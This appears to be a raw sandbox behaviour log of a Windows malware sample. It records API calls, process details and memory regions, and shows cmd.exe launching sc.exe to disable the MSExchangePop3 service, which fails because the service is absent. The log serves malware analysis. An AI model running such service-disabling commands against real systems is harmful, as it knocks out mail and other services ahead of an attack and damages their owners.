GetConsoleTitleW (in: lpConsoleTitle=0x49df53c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.020] InitializeProcThreadAttributeList (in: lpAttributeList=0x49df468, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x49df44c | out: lpAttributeList=0x49df468, lpSize=0x49df44c) returned 1 [0132.020] UpdateProcThreadAttribute (in: lpAttributeList=0x49df468, dwFlags=0x0, Attribute=0x60001, lpValue=0x49df454, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x49df468, lpPreviousValue=0x0) returned 1 [0132.020] GetStartupInfoW (in: lpStartupInfo=0x49df4a0 | out: lpStartupInfo=0x49df4a0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0132.020] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0132.021] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0132.021] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangePop3 start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x49df3f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangePop3 start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x49df43c | out: lpCommandLine="sc config MSExchangePop3 start= disabled", lpProcessInformation=0x49df43c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xc5c, dwThreadId=0xc60)) returned 1 [0132.028] CloseHandle (hObject=0xa4) returned 1 [0132.028] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0132.028] GetEnvironmentStringsW () returned 0x4c29f00* [0132.028] FreeEnvironmentStringsA (penv="=") returned 1 [0132.028] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0132.074] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x49df3d4 | out: lpExitCode=0x49df3d4*=0x424) returned 1 [0132.074] CloseHandle (hObject=0xa8) returned 1 [0132.074] _vsnwprintf (in: _Buffer=0x49df4bc, _BufferCount=0x13, _Format="%08X", _ArgList=0x49df3dc | out: _Buffer="00000424") returned 8 [0132.074] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0132.074] GetEnvironmentStringsW () returned 0x4c2b378* [0132.074] FreeEnvironmentStringsA (penv="=") returned 1 [0132.074] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0132.074] GetEnvironmentStringsW () returned 0x4c2b378* [0132.074] FreeEnvironmentStringsA (penv="=") returned 1 [0132.074] DeleteProcThreadAttributeList (in: lpAttributeList=0x49df468 | out: lpAttributeList=0x49df468) [0132.074] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.074] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0132.074] _get_osfhandle (_FileHandle=1) returned 0x3c [0132.074] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0132.075] _get_osfhandle (_FileHandle=0) returned 0x38 [0132.075] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0132.075] SetConsoleInputExeNameW () returned 0x1 [0132.075] GetConsoleOutputCP () returned 0x1b5 [0132.075] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0132.075] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.075] exit (_Code=1060) Thread: id = 506 os_tid = 0xc4c Process: id = "150" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x74f3b000" os_pid = "0xc1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "149" os_parent_pid = "0xff0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8053 start_va = 0x7f1e6000 end_va = 0x7f1e6fff entry_point = 0x0 region_type = private name = "private_0x000000007f1e6000" filename = "" Region: id = 8054 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8055 start_va = 0x2ae9ae0000 end_va = 0x2ae9afffff entry_point = 0x0 region_type = private name = "private_0x0000002ae9ae0000" filename = "" Region: id = 8056 start_va = 0x2ae9b00000 end_va = 0x2ae9b13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002ae9b00000" filename = "" Region: id = 8057 start_va = 0x2ae9b20000 end_va = 0x2ae9b5ffff entry_point = 0x0 region_type = private name = "private_0x0000002ae9b20000" filename = "" Region: id = 8058 start_va = 0x7df5ff4b0000 end_va = 0x7ff5ff4affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff4b0000" filename = "" Region: id = 8059 start_va = 0x7ff6c39d0000 end_va = 0x7ff6c39f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c39d0000" filename = "" Region: id = 8060 start_va = 0x7ff6c39f4000 end_va = 0x7ff6c39f4fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c39f4000" filename = "" Region: id = 8061 start_va = 0x7ff6c39fe000 end_va = 0x7ff6c39fffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c39fe000" filename = "" Region: id = 8062 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 8063 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8064 start_va = 0x2ae9ae0000 end_va = 0x2ae9aeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002ae9ae0000" filename = "" Region: id = 8065 start_va = 0x2ae9af0000 end_va = 0x2ae9af6fff entry_point = 0x0 region_type = private name = "private_0x0000002ae9af0000" filename = "" Region: id = 8066 start_va = 0x2ae9b60000 end_va = 0x2ae9b60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002ae9b60000" filename = "" Region: id = 8067 start_va = 0x2ae9b70000 end_va = 0x2ae9b76fff entry_point = 0x0 region_type = private name = "private_0x0000002ae9b70000" filename = "" Region: id = 8068 start_va = 0x2ae9b80000 end_va = 0x2ae9b80fff entry_point = 0x0 region_type = private name = "private_0x0000002ae9b80000" filename = "" Region: id = 8069 start_va = 0x2ae9b90000 end_va = 0x2ae9c8ffff entry_point = 0x0 region_type = private name = "private_0x0000002ae9b90000" filename = "" Region: id = 8070 start_va = 0x2ae9c90000 end_va = 0x2ae9d4dfff entry_point = 0x2ae9c90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8071 start_va = 0x2ae9d50000 end_va = 0x2ae9d8ffff entry_point = 0x0 region_type = private name = "private_0x0000002ae9d50000" filename = "" Region: id = 8072 start_va = 0x2ae9d90000 end_va = 0x2ae9d90fff entry_point = 0x0 region_type = private name = "private_0x0000002ae9d90000" filename = "" Region: id = 8073 start_va = 0x2ae9e70000 end_va = 0x2ae9e7ffff entry_point = 0x0 region_type = private name = "private_0x0000002ae9e70000" filename = "" Region: id = 8074 start_va = 0x2ae9e80000 end_va = 0x2aea007fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002ae9e80000" filename = "" Region: id = 8075 start_va = 0x2aea010000 end_va = 0x2aea190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002aea010000" filename = "" Region: id = 8076 start_va = 0x2aea1a0000 end_va = 0x2aeb59ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000002aea1a0000" filename = "" Region: id = 8077 start_va = 0x7ff6c38d0000 end_va = 0x7ff6c39cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c38d0000" filename = "" Region: id = 8078 start_va = 0x7ff6c39fc000 end_va = 0x7ff6c39fdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c39fc000" filename = "" Region: id = 8079 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 8080 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 8081 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8082 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8083 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 8084 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8085 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8086 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8087 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8088 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8089 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8090 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 8091 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 8092 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 503 os_tid = 0xff8 Thread: id = 504 os_tid = 0xc30 Thread: id = 505 os_tid = 0xc40 Process: id = "151" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x420b6000" os_pid = "0xc5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "149" os_parent_pid = "0xff0" cmd_line = "sc config MSExchangePop3 start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8106 start_va = 0x560000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 8107 start_va = 0x580000 end_va = 0x581fff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 8108 start_va = 0x590000 end_va = 0x5a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 8109 start_va = 0x5b0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 8110 start_va = 0x5f0000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 8111 start_va = 0x630000 end_va = 0x633fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 8112 start_va = 0x640000 end_va = 0x640fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 8113 start_va = 0x650000 end_va = 0x651fff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 8114 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 8115 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 8116 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8117 start_va = 0x7ea00000 end_va = 0x7ea22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ea00000" filename = "" Region: id = 8118 start_va = 0x7ea2b000 end_va = 0x7ea2dfff entry_point = 0x0 region_type = private name = "private_0x000000007ea2b000" filename = "" Region: id = 8119 start_va = 0x7ea2e000 end_va = 0x7ea2efff entry_point = 0x0 region_type = private name = "private_0x000000007ea2e000" filename = "" Region: id = 8120 start_va = 0x7ea2f000 end_va = 0x7ea2ffff entry_point = 0x0 region_type = private name = "private_0x000000007ea2f000" filename = "" Region: id = 8121 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8122 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8123 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 8124 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8125 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 8126 start_va = 0x690000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 8127 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8128 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8129 start_va = 0x7e0000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 8130 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8131 start_va = 0x560000 end_va = 0x56ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 8132 start_va = 0x570000 end_va = 0x573fff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 8133 start_va = 0x6a0000 end_va = 0x75dfff entry_point = 0x6a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8134 start_va = 0x760000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 8135 start_va = 0x7a0000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 8136 start_va = 0x9d0000 end_va = 0x9dffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 8137 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8138 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8139 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8140 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8141 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8142 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8143 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8144 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8145 start_va = 0x7e900000 end_va = 0x7e9fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e900000" filename = "" Region: id = 8146 start_va = 0x7ea28000 end_va = 0x7ea2afff entry_point = 0x0 region_type = private name = "private_0x000000007ea28000" filename = "" Region: id = 8147 start_va = 0x8e0000 end_va = 0x9befff entry_point = 0x8e0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 8148 start_va = 0x660000 end_va = 0x671fff entry_point = 0x660000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 507 os_tid = 0xc60 [0132.062] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0132.062] __set_app_type (_Type=0x1) [0132.062] __p__fmode () returned 0x77ac4d6c [0132.062] __p__commode () returned 0x77ac5b1c [0132.062] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0132.062] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0132.062] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.065] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.065] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0132.065] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0132.065] _wcsicmp (_String1="config", _String2="query") returned -14 [0132.065] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0132.065] _wcsicmp (_String1="config", _String2="start") returned -16 [0132.065] _wcsicmp (_String1="config", _String2="pause") returned -13 [0132.065] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0132.065] _wcsicmp (_String1="config", _String2="control") returned -14 [0132.065] _wcsicmp (_String1="config", _String2="continue") returned -14 [0132.065] _wcsicmp (_String1="config", _String2="stop") returned -16 [0132.065] _wcsicmp (_String1="config", _String2="config") returned 0 [0132.065] ResolveDelayLoadedAPI () returned 0x77262c10 [0132.065] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x7e8540 [0132.067] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0132.067] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0132.067] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0132.067] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0132.067] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0132.067] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0132.067] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0132.067] OpenServiceW (hSCManager=0x7e8540, lpServiceName="MSExchangePop3", dwDesiredAccess=0x3) returned 0x0 [0132.068] GetLastError () returned 0x424 [0132.068] _ultow (in: _Dest=0x424, _Radix=6487208 | out: _Dest=0x424) returned="1060" [0132.068] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0132.069] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x62fc84, nSize=0x2, Arguments=0x62fc9c | out: lpBuffer="裐~ﳄb蔔è") returned 0x62 [0132.069] GetFileType (hFile=0x3c) returned 0x2 [0132.069] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x62fc68 | out: lpMode=0x62fc68) returned 1 [0132.070] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x7e88d0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x62fc78, lpReserved=0x0 | out: lpBuffer=0x7e88d0*, lpNumberOfCharsWritten=0x62fc78*=0x62) returned 1 [0132.070] LocalFree (hMem=0x7e88d0) returned 0x0 [0132.070] LocalFree (hMem=0x0) returned 0x0 [0132.070] CloseServiceHandle (hSCObject=0x7e8540) returned 1 [0132.070] LocalFree (hMem=0x0) returned 0x0 [0132.070] exit 